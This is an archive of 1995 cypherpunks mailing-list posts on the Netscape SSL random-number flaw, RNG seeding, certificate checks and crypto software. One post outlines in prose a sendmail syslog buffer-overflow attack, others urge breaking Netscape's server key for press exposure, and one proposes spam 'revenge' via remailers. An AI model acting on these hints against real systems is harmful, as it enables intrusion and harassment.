MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 23 Sep 95 09:19:39 PDT
To: cypherpunks@toad.com
Subject: Step One: We admitted
Message-ID: <199509231619.JAA15885@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


We admitted we were powerless over the prospect of a 
Cypherpunk Press Release. That our coding had become 
unmanageable.......

Love Always,

Carol Anne Coketrader
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 23 Sep 95 11:24:07 PDT
To: cypherpunks@toad.com
Subject: Seattle Cypherpunks
Message-ID: <199509231823.LAA15147@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Seattle-area Cypherpunks Get Together
Thursday, September 28
7:30 PM

Seattle Center House/Food Circus
Entrance opposite the Flag Pavillion

look for a table with a Compaq laptop busily signing keys

This is a very informal, unstructured get together.  More of a chance to
meet other folks with similar interests.  With all of the recent activities
in crypto-land, I'm sure there will be lots to talk about.  Bring a disk
with your key so I can put my ancient 386 laptop to some good use.  I'll
also load up some relatively new Windows crypto software for show and tell.

Eastsiders (Bellevue/Redmond environs) that don't feel like braving the
bridge, let me know.  I've got a van and will be headed west from Carnation
and would be happy to car-pool.

Hope to see you there...

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 08:43:53 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: Seeds which depend on machine states
In-Reply-To: <9509221519.AA19310@cantina.verity.com>
Message-ID: <199509231543.LAA05907@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> > Try getting a human to type with the same timing, to microsecond
> > precision, the same way twice.
> > 
> That assumes that you have someway of measuring the timing to microsecond
> precision.

PCs have accurate microsecond timers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 23 Sep 95 08:46:30 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: HEY!!! WAS: The Next Hack
Message-ID: <v0153050aac89da46099c@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 9/23/95, Mike McNally wrote:
>David Mandl writes:
> > Looks like we've got a perfect candidate for the first Official
> > Cypherpunks Press Release, folks.
>
>Then sign me off.  If something that inane were to go out with the
>word "cypherpunk" affixed to it, I'd cringe.  It could only be worse
>if it ended with the catchphrase "hack the planet".

Sigh.  In case there was any misunderstanding, it was a JOKE.  I was making
a comment about "Censored Girl's" loony-bin post as well as recent
proposals that we should be issuing official press releases.  Surely my
subtle sense of humor isn't THAT subtle.  Here:

:-)

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 23 Sep 95 12:19:44 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Going after Netscape"
In-Reply-To: <ac88af4202021004670f@[205.199.118.202]>
Message-ID: <199509231914.MAA01326@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
> seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
> as several of us noted a few months ago...probably a different problem, but
> indicative that Netscape can be corrupted). But let's be careful not to
> convey any flavor of this being a vendetta.

	I agree. The goal is not to kill Netscape but to make the net
secure.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 23 Sep 95 12:24:16 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: The Next Hack
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <199509231919.MAA01818@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   What exactly is the point of this?  We have:

	Is Netscape going to cover the cost of getting the new keys
that the servers generate signed and certified by Versign? Is netscape
going to tell its customers that they need to regenerate their
keys and get new certificates?

	Like I've said, I'm very impressed with netscape's quick
response and almost everything they've done.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 23 Sep 95 12:28:53 PDT
To: carolann@censored.org (Censored Girls Anonymous)
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <199509231217.FAA27504@usr1.primenet.com>
Message-ID: <199509231923.MAA02185@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> You HAD stated a patch would be available by Friday.
> Now we are at early next week.

	I'd rather wait a few days for a good patch than have a bad,
untested patch available earlier.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 23 Sep 95 14:08:32 PDT
To: stewarts@ix.netcom.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509232108.OAA17020@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM 9/22/95 -0700, David G. Koontz wrote:
> If NSA requires real stochastic results for military crypto, what would
> we as casual cryptographers feel comfortable with?  The Netscape episode
> shows the comfort level needs improving.
>
> How good is good enough?


128 bits of true entropy, in your RNG seed, and never leaked 
is good enough.  (You one way hash the RNG numbers generated, 
to avoid leaking any information about your internal RNG state.)

Your RNG number must of course be based on the full seed, not on
some 16 bit subset of the seed.

To be on the safe side, you might use 128 bytes of seed, or 4K 
bytes of seed, just because gross overkill is cheap, and it is kind 
of nice to have a seed larger than any random numbers you might 
really need.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Fri, 22 Sep 95 20:20:29 PDT
To: cypherpunks@toad.com
Subject: speak freely
Message-ID: <199509230320.AA01298@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


"One Time! This must be some new meaning of `one time' that I'm
not acquanted with." - apologies to Douglas Adams.

------- Forwarded Message

 Date: Fri, 22 Sep 95 16:11:20 PDT
 From: ari@es.net (Ari Ollikainen)
 Message-Id: <9509222311.AA27810@viipuri.nersc.gov>
 To: RCWG@nic.hep.net, ESCC@viipuri.nersc.gov
 Subject: FWD: Free secure Internet voice communication
 Cc: rem-conf@es.net, videophone@es.net

	Found in my mailbox...

  From: John Walker <kelvin@fourmilab.ch>
  Subject: Free secure Internet voice communication

I've just released to the public domain Release 5 of Speak Freely for
Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics
workstations.  Assuming you have a fast enough connection to the
Internet (with reasonably consistent packet delivery time) and/or a
fast enough CPU to perform audio compression in real time, you can
talk to anybody on Earth connected to the Internet who's also running
the program.  The Windows and Unix versions have entirely different
user interfaces, but can intercommunicate.  Complete source code is
available.

For communications security, IDEA, DES (less initial and final
permutations), and one-time pad (re-used for each sound packet)
encryption are available.  The intensely paranoid can enable any
combination of these.  The documentation explains how to use PGP to
securely exchange session keys before a conversation; an automatic
session key generator is provided.  DES is included for commercial
users who don't have a license to use the IDEA patent.  One-time pad
encryption is for those with machines too slow to run IDEA or DES in
real time.

I didn't include a public key mechanism because I wanted to avoid all
the confusion.  If somebody wants to navigate the narrow strait
between the RSA patent Scylla and Charybdis of export controls, the
programming work to implement public keys is straightforward and the
source code is yours to hack.

For further information, see:

    http://www.fourmilab.ch/netfone/windows/speak_freely.html

which describes the Windows version in detail and contains pointers to
the Sun and SGI editions, as well as links to download source code and
a ready-to-run executable for Windows.  You can also obtain the
program by anonymous binary FTP:

Unix source code:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz

Windows executable:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip

Windows source code (for Visual C 1.5):
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip

The Sun and SGI versions of this program are quite stable, and should
work for just about anybody with an adequate network connection.
Porting the code to other Unix workstations with audio hardware should
be relatively straightforward.  The Windows version has just been
finished and until it's shaken down on a variety of machines,
networks, sound cards, etc. may not work for everybody.

The Windows version requires a sound card with Windows Multimedia
drivers (I've tested it on a variety of Sound Blasters of various
generations) and a TCP/IP stack that supports WINSOCK (I'm using
NetManage Chameleon NFS).  Since multimedia and network hardware and
drivers vary tremendously from machine to machine, I wouldn't be
surprised if some tweaking were needed for various configurations.
The CPU speed required interacts with the speed of your network
connection; if you have a high-bandwidth connection to the Internet,
or you're talking to another person on a high-speed LAN, there's no
need to compress sound and the CPU load is minimal; just about any
machine will do.  If you need to compress in order to squeeze 8000
samples per second into a dial-up connection, then you need a CPU fast
enough to run GSM compression in real time: basically we're talking a
very fast 486 or Pentium.  If you turn on IDEA and/or DES encryption,
that also consumes CPU time.

Based on my experience with other Windows programs, it will probably
take months to track down misbehaviour due to strange hardware and
software configurations.  Complete, detailed bug reports are welcome.
I may not be able to respond individually, but the Web page will track
updates as they're released.  I have tested the program only on
vanilla 16 bit Windows 3.1.

The Windows version contains preliminary code to support direct
dial-up modem connections, acting as a phone scrambler.  Serial port
support in most Windows machines is so poor (unless you have a 16550A
UART and appropriate drivers, which most people don't) that this
feature isn't usable at present.  I've left the code in just in case
somebody with suitable hardware wants to bash it into working form.

If you add features, port the program to 32 bits, fix bugs, etc., let
me know so I can make your contributions generally available.

--------------------  <http://www.fourmilab.ch/>  -------------------
John Walker                      | A sufficiently advanced
Internet: kelvin@fourmilab.ch    | technology is indistinguishable
                                 | from a rigged demo.


------- End of Forwarded Message






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Sat, 23 Sep 95 10:41:57 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net>
Message-ID: <199509231738.NAA25269@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22, 10:10, David J. Bianco sent the following to the NSA's mail
archives:
> Subject: SSL Man-in-the-middle
|| I've read through the SSL spec, and it provides authentication for both
|| the server and the client, but these features are rarely used, probably
|| because they are somewhat inconvenient for the user.  A good first step
|| would be to include the IP address of the server in the certificate
|| signed by VeriSign. In this way, browsers could perform automatic checks
|| that the IP address in the certificate is actually the one that's being
|| communicated with. This does raise other questions (such as protecting
|| from IP spoofing), but IMHO would be a good way of providing an
automatic
||  "first check" without inconveniencing users.  The added inconvenience
of
|| obtaining a new certificate when your server's IP address changes is
|| fairly minor, and could be viewed as necessary overhead for doing secure
|| transactions via the Net.
||
||

Of course, the above is complete and utter crap (as Simon Spero pointed out
to me in much, much more polite terms 8-).  Let me take a stab at v2.0:

I've read through the SSL spec, and it provides authentication for both the
server and the client, though these features are rarely used, probably
because they are somewhat inconvenient for the user.  A good practice would
be to always code your SSL app to check that the CN (Common Name) field of
the certificate is the same as the hostname listed in the URL (CN always
appears to be an IP address, at least for Netscape server certificates).


Still, even with the bogus last paragraph, I stand by the rest of my post.
 I obviously haven't seen Netscape source, so I don't really know what
checks it might have, but none of the other SSL apps I've seen have an
auto-check feature, though it doesn't seem to be much more trouble at all.


--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 11:31:54 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509230003.RAA06024@orac.engr.sgi.com>
Message-ID: <199509231831.OAA06104@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> In article <DFALB4.A5u@sgi.sgi.com>, "Perry E. Metzger" <perry@piermont.com> 
writes:
> 
> > I can tell you in general terms -- I don't write MIPS assembler
> > myself. However, I will point out to you that you use an ancient
> > Sendmail, and that it uses syslog(3) on user produced data, and that
> > syslog uses a static buffer. Trick sendmail into logging something
> > very big, and you can do what you like. The 8lgm people wrote a demo
> > for Sparc as a proof of concept.
> 
> Hmm, after having looked at the syslogd code, it looks like this
> particular bug has been fixed for at least several years.

I said syslog(3), not syslogd(8).

The bug is in the client, not the server. Yes, you suffer from it. Go
and check.

> However, there sure are a hell of a lot of fixed size buffers being
> alocated off the stack and some of them are being used in unsafe
> ways.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 23 Sep 95 05:40:19 PDT
To: cypherpunks@toad.com
Subject: 500m.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
Message-ID: <199509231240.OAA08555@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NYT Magazine, Sept 24, 1995


How the Propeller Heads Stole the Electronic Future

The silver-haired media monopolists follow their 500-
channel dream. They haven't reckoned with the 500 million
channels of Netscape and the Internet.

By Steven Levy.


If you want an arbitrary date for the burial of the
500-channel dream, Aug. 9, 1995, will do just fine. On
that morning, the public had its first crack at buying
stock in the year-old Netscape Commumcations Corporation,
which makes software that helps people navigate the
Internet and set up "sites" that Net surfers can visit.
What happened next is already the stuff of high-tech
legend. The offering price of $28 per share shot up
within minutes to a vertiginous $75 until finally
settling at $58, a price that valued the
as-yet-profitless company at well over $2 billion. A
month later, it was trading at about $53.

The initial news reports focused on the instant
millionaires at Netscape, including a 24-year-old
computer programmer, Marc Andreessen, who emerged from
the stock offering with that all-important first $58
million. But the real significance of the event was not
that another bunch of propeller heads had joined the
ranks of the super-rich. Aug. 9 marked the moment when
Wall Street finally realized what had been becoming
increasingly apparent to computer users: a set of highly
technical but reliably standardized communications
protocols known as the Internet had established itself as
the real key to the electronic future. That future would
be made not by silver-haired telephone- and cable-company
executives in Denver, New York and Washington, building
an empire around a golden goose called pay-per-view
television, but by companies like Netscape and their
customers.

In short, the end of the 500-channel dream. This was a
myth constructed by the masters of the media, people like
John Malone of Tele-Communications Inc. (T.C.I.), Ray
Smith of Bell Atlantic and Sumner Redstone of Viacom.
They believed that the television set would extend its
domain from the center of the entertainment universe to
the worlds of commerce and information. Despite their
promises that the new era of digital media would be
marked by increased competition, they assumed that their
companies would keep their hands on the valves of a
limited information pipeline. But for consumers, the
dream offered only two differences, really, between what
the public has now and what will be available in the
future.

*The same programming but more of it*. Instead of getting
50 or 60 alternatives when you plopped down in front of
the tube, you'd get a lot more. Five hundred was the
number that stuck in people's minds.

*So-called interactive programming*. The interactivity
comes in makng choices: pressing buttons to choose
programs and, above all, to buy things. The living-room
television would be a cash register of sorts, enabling
Dad, Mom, Junior, Sis and probably even the faithful dog
Astro to buy more programming -- and buy more everything,
from pizzas to Dustbusters.

The operators of those systems, like T.C.I. and Time
Warner, would act as gatekeepers, deciding which
entertainment channels, pay-per-view events, banks,
retailers, publications and data bases would reach
consumers. There were tremendous opportunities to make
money, not only from monthly fees and pay-per-view
charges but also from percentages of every transaction.
And then there was the wealth of information about
consumer buying habits generated by the aggregation of
buying choices made by pressing those buttons. This, too,
would be sold and bartered.

For the past few months the silver-haired guys have been
arranging expensive technology tests in places like
Orlando, Fla. They have been wooing Congress for
favorable regulations. They have been frantically merging
and making alliances. But meanwhile, a different vision
of the media future has begun to form -- totally under
their radar. It moved from the academic and scientific
communities, then to the business world, then to
politics. As it grew and grew, it suddenly became clear
that this new vision had the potential to pull the plug
on the 500-channel dream.

This is the Internet and its most interesting subset, the
World Wide Web. It is based on unlimited channels of
communication, community building, electronic commerce
and a full-blown version of interactivity that blurs the
line between provider and consumer. You don't need an
Arthur Andersen report or even a cyberpunk science
fiction novel to envision how this new model of the
future will work. Millions are already participating in
it. Its nascent form -- albeit with often sluggish
performance and frequent system crashes -- has spread
like digital wildfire.

In short, the information superhighway, font of a
thousand bad metaphors, is already here. But it's not
about sitting on a couch and pressing a button to order
"Dumb and Dumber." It's about Web surfing, open systems
and freedom.

Why did the stock market go bonkers for Netscape, a
year-old company that not only operated deep in the red
but also warned in its prospectus that it did not intend
to make any profits "in the foreseeable future?" Only one
reason: the Internet

If the 500 channel dream on the TV screen is the old
future, the new one is the Internet on the computer
screen. Think of it as a combination book, radio,
magazine, mailbox, conversation parlor, bulletin board,
billboard and, one day, television set. Install what is
known as a browser program -- the most popular is
Netscape's Navigator -- and you're cruising the World
Wide Web. Your screen is a selection of signed baseballs
up for auction, a tour of the Louvre, a zine (a
self-published magazine) on the life of a teen-age girl
in Canada, a multimedia repository of General Electric's
public relations documents, the complete text of the
Congressional Record. Millions of possibilities await
you, and getting to them is easy. Anything can be wired
to anything else on this World Wide Web (thus the name)
by moving the cursor to a highlighted word or image with
an embedded link to another location.

Web travelers do not just travel by links, of course --
they can go directly to any Web site. The interesting
thing about the sites is their equality. Like phone
numbers, or addresses on letters, these addresses have no
favored positions; in terms of gaining access to homes,
ABC, Disney and Sears have no inherent advantage over
Joe's Video or the corner pizza parlor. (For help in
knowing what's available, people are already adopting the
first of a new breed of electronic guide services, like
the popular Yahoo Web site, a sort of Baedeker's of the
Net.)

At first, Web traveling seems like a fascinating but
perhaps frivolous diversion. But then you consider the
next step -- commerce. Secure creditcard transactions are
already possible, the ability to charge for time spent on
a link is currently being implemented and companies like
Visa, Mastercard and newer entities with names like
Cybercash and Digicash (and, yes, Microsoft) are
concocting Net-based technologies that work just like
cash. And then you begin to realize why some farsighted
people in the media industries are terrified of the World
Wide Web. Every home is potentially a video conferencing
center, every independent film maker is potentially a
widespread broadcaster, every business is potentially a
global marketer. A single twisted idea and a rudimentary
sense of layout can transform a voiceless outcast into a
cult publisher. Now that's interactivity.

The 500-cable-channel tests are just the beginning of a
long process. The Net, meanwhile, has millions of people
on it, now. It will take a decade or so to upgrade the
Net to carry high-quality video services, but most
everything else is feasible now and better suited to the
desktop than to the TV room. You can't easily read a
newsletter or a bank balance on a television set that's
20 feet away. So by the time the cable and telephone
companies get their systems in order, millions of
Americans will be riding the I-way from their dens and
offices, not their living rooms. Sure, eventually the
electronics of computers and televisions will be
indistinguishable, but by then the road to information
nilvana will have been laid -- and the ethos will be that
of the Internet.

In that ethos, the people who provide you the pipes to
move information have no say in what content moves
through those pipes. They collect no information on their
consumers' buying habits, and they certainly do not get
a piece of the transactions that occur over their wires.
The guys in the middle -- those with the 500-channel
dream -- will thus be cut out of the best part of the
action.

The masters of the media have taken notice, and lately
they've been hedging their bets. Still, they have yet to
grasp that the Internet can never be merely another
profit center in their dreams of empire. Their power is
based on monopoly, on controlling distribution. But the
Net is built to smash monopolies. Instead of a
gatekeeper, users get an open invitation to the
electronic world and can choose whatever they want. "If
there is a market for 500 channels," says James
Barksdale, Netscape's president, "imagine the market for
5 million, 50 million, 500 million!"

Now, this new vision doesn't portend poverty for the
media masters. There's still a place for movie studios,
television producers and music publishers -- the Disneys
of the world -- in this new, content-driven universe. The
phone companies will provide Internet access to the
masses. And the couch-potato style of television will
probably always be with us.

But it won't be business as usual for the media masters.
It's entirely possible that beginning novelists,
musicians and even film makers will choose to distribute
through the Web. And it's almost inevitable that one day
soon, a John Grisham, an R.E.M. or a Roseanne will grasp
the advantages of ditching the media company and selling
directly to the consumer.

A year ago, people were buzzing about the proposed (and
eventually aborted) marriage of Bell Atlantic and T.C.I.
Now people are talking about Disney and Cap Cities, CBS
and Westinghouse, and Ted Turner and some other
television network. But if the World Wide Web shatters
the current paradigm of distribution, the channel
capabilities of cable systems and even networks will be
severely devalued. Anyone will be able to set up a new
channel or storefront on the virtual highway, for free,
asking permission of no one and accepting income directly
over the wire.

This is why John Perry Barlow, co-founder of the
Electronic Frontier Foundation, calls the current vave of
media realliances "the rearrangement of deck chairs on
the Titanic."

The iceberg, of course, is the Internet.

----------

Steven Levy is a columnist for Newsweek. His last article
for the New York Times Magazine was "The Unabomber and
David Gelernter."












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Sat, 23 Sep 95 06:15:30 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0swUQ2-0002EDC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


Again, we're Spammed by a moron.
Time to fire up the old remailers!
[At least they do this on weekends, when we have
time for creative revenge!] Hehehehehe...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 12:35:32 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Why I haven't begun to be nasty to Netscape (was Re: The Next Hack)
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <199509231935.PAA06187@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   What else do you hope to gain by breaking a server key?  I think
> the point has been made.  Is there anything else that you would
> reasonably expect that we would do in response to a server key
> being broken that we have not already done?

Well, I don't know what the point was -- I don't think its a useful
effort -- but I would like to make the following comment.

One problem I've had is that this isn't some toy being built at NCSA
any more -- its something that lots of real money depends on. If I
treated my security critical code for my wall street clients the way
you guys have treated a lot of your code, I'd expect to be blackballed
and never work at anything more lucrative than shoe-shining again in
my entire carrer. You've all been giving the very standard "We're
overworked -- we didn't know -- I didn't look at that" sort of
answers. Thats all fine and well -- but when the money gets stolen or
the plane crashes it isn't good enough.

Code like this has to be treated with enormous seriousness. That means
code reviews. That means people follow systematic security proceedures
-- and thats not just in the "security code" because that isn't where
the break will come. It means that there are coding standards. It
means people break their backs very very seriously checking everything
and rechecking it, and then torture testing it. You folks are still
operating as if you are a garage operation when it comes to this
stuff, even though you are selling commerce servers that people depend
on for their business to operate.

You guys have gotten off quite lightly -- you screw up in a way that
could have cost your clients real money and all that happened is some
bad press and pressure to fix things. However, don't expect to be
treated that well next time. Those of us who are adults in this
business expect that we won't get second chances if we fuck a client
good and hard, and you guys shouldn't feel as though you've got
another couple of strikes to go. As I said, if I fucked up that way
I'd expect to have my carrer permanently ruined. You got off *easy*.

In my part of the universe, which is very close to the part you guys
have started to tread in, people treat this stuff very seriously.

As it happens, I know of some places in the financial community where
people have started to act lazy. I'm expecting to see lots of people
lose their carrers when something bad happens.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sat, 23 Sep 95 12:49:22 PDT
To: cypherpunks@toad.com
Subject: macworld crypto articles
Message-ID: <199509231949.PAA23337@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


The current (11/95) issue of MACWORLD magazine has two good crypto articles
in it.

1 - Protect your E-Mail by Bruce Schneier
Good introduction for neophytes, the basic how and why. Get some reprints
and give them away with PGP to your nonCypherpunk computer friends.


2 - False Security by Gene Steinberg

They searched for an applications programmer *UN*skilled at cryptography to
try and crack the password protection of the 8 best selling Mac programs.
Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.

Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 23 Sep 95 15:54:15 PDT
To: cypherpunks@toad.com
Subject: Re: The Fortezza random number generator is not trustworthy
Message-ID: <199509232254.PAA11243@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A nice addition to any Netscape RNG hacks is the comment that,
while Netscape may have a bug in their RNG, it's detectable and fixable;
the NSA may have a BUG in theirs, and only they'll know for sure...

>> Yes Fortezza cards can be instructed to produce a random number through one
>> of its library calls (someday they'll have a real API).  One of the
>> diagnostic tools I had tested this function.  What algorithm do they use?
>> Haven't a clue.  Sources say that the RNG implementation may vary from vendor
>> to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

John Gilmore's comments on CAPSTONE, subliminal channels, and FOIA blackouts 
certainly add depth to this suspiciousness.  I'd initially not been too worried
about the Fortezza (besides the obvious Master Key problems) because the NSA
is letting the military use them for Defense Messaging Service.  However,
if the RNG might be different for different vendors, the non-military versions
may be using a weak RNG, which the NSA has a backdoor to.  Alternatively,
the RNGs may all be the same, but there may be an option that the military can
use to get full-strength random numbers while the public, not knowing this,
gets weakened ones (e.g. the first n bits of the RNG may be random, and the next
N-n bits may be a strong hash, while there are N-n real random bits in another
register if you ask for them nicely.)

On a technical note, I would have thought that Fortezza and/or CAPSTONE used
some sort of hardware RNG, i.e. noisy Zener diodes or whatever.  I've seen it
mentioned on this list that some other NSA secure phones, such as STU-III,
do that.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 23 Sep 95 13:05:49 PDT
To: cypherpunks@toad.com
Subject: Re: "Going after Netscape"
Message-ID: <199509232003.QAA11668@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509231914.MAA01326@infinity.c2.org>, sameer@c2.org (sameer)
wrote:

>> So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
>> seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
>> as several of us noted a few months ago...probably a different problem, but
>> indicative that Netscape can be corrupted). But let's be careful not to
>> convey any flavor of this being a vendetta.
>
>        I agree. The goal is not to kill Netscape but to make the net
>secure.

Absolutely. We aren't on a vendetta. We want to make the net secure for
privacy. If hacking a Netscape server will help that goal, surely
Netsape's own would be the most appropriate server to try, since it will
generate the largest exposure in the press and thereby the strongest
motivation for Netscape to fix the hole.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGRoHyoZzwIn1bdtAQHJCgF9FbuTP1VBbzGJANFX48hvje4V7pzhyEaQ
ItXGdXHCPbxjKbQ0bLApkt4yTtHJREMk
=wEyv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 23 Sep 95 13:07:26 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
Message-ID: <199509232005.QAA11679@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509231919.MAA01818@infinity.c2.org>, sameer@c2.org (sameer)
wrote:

>> 
>>   What exactly is the point of this?  We have:
>
>        Is Netscape going to cover the cost of getting the new keys
>that the servers generate signed and certified by Versign? Is netscape
>going to tell its customers that they need to regenerate their
>keys and get new certificates?
>
>        Like I've said, I'm very impressed with netscape's quick
>response and almost everything they've done.

I would be even more impressed if Netscape made their code publicly
available for examination.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGRoeyoZzwIn1bdtAQGg4wF/XTLT2U7mXi2MZ5pgSZQMd9VdLZJcp5MD
wgBWaGCNIzsQnkwB4ZkTyjJAOwFf0OkJ
=+ZRt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
